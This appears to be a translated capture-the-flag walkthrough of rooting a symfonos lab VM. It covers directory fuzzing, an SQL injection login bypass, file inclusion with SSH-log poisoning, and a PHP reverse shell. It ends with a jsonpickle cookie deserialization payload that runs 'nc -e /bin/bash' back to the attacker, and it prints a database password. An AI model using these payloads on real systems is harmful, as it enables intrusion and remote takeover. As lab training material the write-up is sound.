The content of this post is purely fictional. Gonglüe Ya (攻略鸭) asks for your follow and likes on Bilibili!
Use VirtualBox; VMware does not work for this VM.
Target IP address: 192.168.31.215
Attacker (test machine) IP address: 192.168.31.38
External information gathering
Visiting http://192.168.31.215/ shows nothing but a single img image.
Port scan
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.9p1 Debian 10 (protocol 2.0)
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))
Web directory enumeration
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.215/FUZZ -e .php,.txt -c
/gods/
atlantis.php
sea.php
Visiting http://192.168.31.215/gods/ reveals three log files: hades.log, zeus.log and poseidon.log, each an introduction to one mythological figure.
Searching the returned content in a search engine shows it is the output of the uptime command.
Visiting http://192.168.31.215/atlantis.php shows a login form.
Logging in with a classic SQLi authentication-bypass password returns a 302 redirect to sea.php. Clicking the hades option changes the URL to http://192.168.31.215/sea.php?file=hades, and the page shows the introduction from hades.log.
Testing for file inclusion
GET /sea.php?file=../../../../../../etc/passwd
GET /sea.php?file=../../../../../etc/passwd%00
Both fail. Since hades.log, zeus.log and poseidon.log all carry the .log suffix, try reading another .log file:
GET /sea.php?file=../../../../../var/log/auth
This successfully returns the SSH log. Next, write PHP into that log through the SSH username (log poisoning):
ssh '<?php phpinfo(); ?>'@192.168.31.215
GET /sea.php?file=../../../../../var/log/auth
This now returns the phpinfo page.
ssh '<?php system($_GET['cmd']); ?>'@192.168.31.215
GET /sea.php?cmd=id&file=../../../../../var/log/auth
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ nc -nvlp 9000
GET /sea.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.31.38%22%2C9000%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27&file=../../../../../var/log/auth
$ python -c 'import pty;pty.spawn("/bin/bash")'
Local information gathering
www-data@MiWiFi-R3600-srv:/var/www/html$ cat atlantis.php
<?php
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'yVzyRGw3cG2Uyt2r');
$db = new PDO("mysql:host=localhost:3306;dbname=db", DB_USERNAME, DB_PASSWORD);
$statement = $db->prepare("Select * from users where username='".$username."' and pwd='".$pwd."'");
$statement->execute();

www-data@MiWiFi-R3600-srv:/var/www/html$ cat sea.php
<?php
include("gods/". $_GET['file']. '.log');
?>

www-data@MiWiFi-R3600-srv:/$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
poseidon:x:1000:1000:,,,:/home/poseidon:/bin/bash

Locally listening ports:
tcp LISTEN 0 128 127.0.0.1:8080 0.0.0.0:*

Useful software:
/usr/bin/base64
/usr/bin/g++
/usr/bin/gcc
/usr/bin/make
/usr/bin/nc
/usr/bin/nc.traditional
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/python3.7
/usr/bin/socat
/usr/bin/wget

The /opt directory is usually empty, but here /opt/code exists:
www-data@symfonos4:/opt/code$ ls -alh
drwxr-xrwx 4 root root 4.0K Aug 19 2019 .
drwxr-xr-x 3 root root 4.0K Aug 18 2019 ..
-rw-r--r-- 1 root root  942 Aug 19 2019 app.py
-rw-r--r-- 1 root root 1.5K Aug 19 2019 app.pyc
drwxr-xr-x 4 root root 4.0K Aug 19 2019 static
drwxr-xr-x 2 root root 4.0K Aug 19 2019 templates
-rw-r--r-- 1 root root  215 Aug 19 2019 wsgi.pyc
Running cat app.py shows that the application uses jsonpickle.
Forwarding port 8080 with socat
socat TCP-LISTEN:8081,fork TCP:127.0.0.1:8080
Visit http://192.168.31.215:8081/whoami
Cookie: PHPSESSID=q7ctie2m9dp9fhv48m82t28204; username=eyJweS9vYmplY3QiOiAiYXBwLlVzZXIiLCAidXNlcm5hbWUiOiAiUG9zZWlkb24ifQ==
The username cookie base64-decodes to: {"py/object": "app.User", "username": "Poseidon"}
flask-json-pickle vulnerability
Searching for "jsonpickle exploit" turns up the flask-json-pickle vulnerability; the published exp:
{"py/object": "__main__.Shell", "py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": ["whoami"]}, null, null, null]}
Start a listener on the test machine: nc -nvlp 3334
Change the system-command call to os.system, giving:
{"py/object":"__main__.Shell","py/reduce":[{"py/type":"os.system"},{"py/tuple":["/usr/bin/nc -e /bin/bash 192.168.31.38 3334"]},null,null,null]}
Base64-encode it, send it as the username cookie, and a shell comes back:
# id
uid=0(root) gid=0(root) groups=0(root)
Other
Flag
# cat /root/proof.txt
Congrats on rooting symfonos:3!
Open questions
1. In the flask-json-pickle exp, every method I tried other than nc failed;
2. Are there other ways to escalate privileges?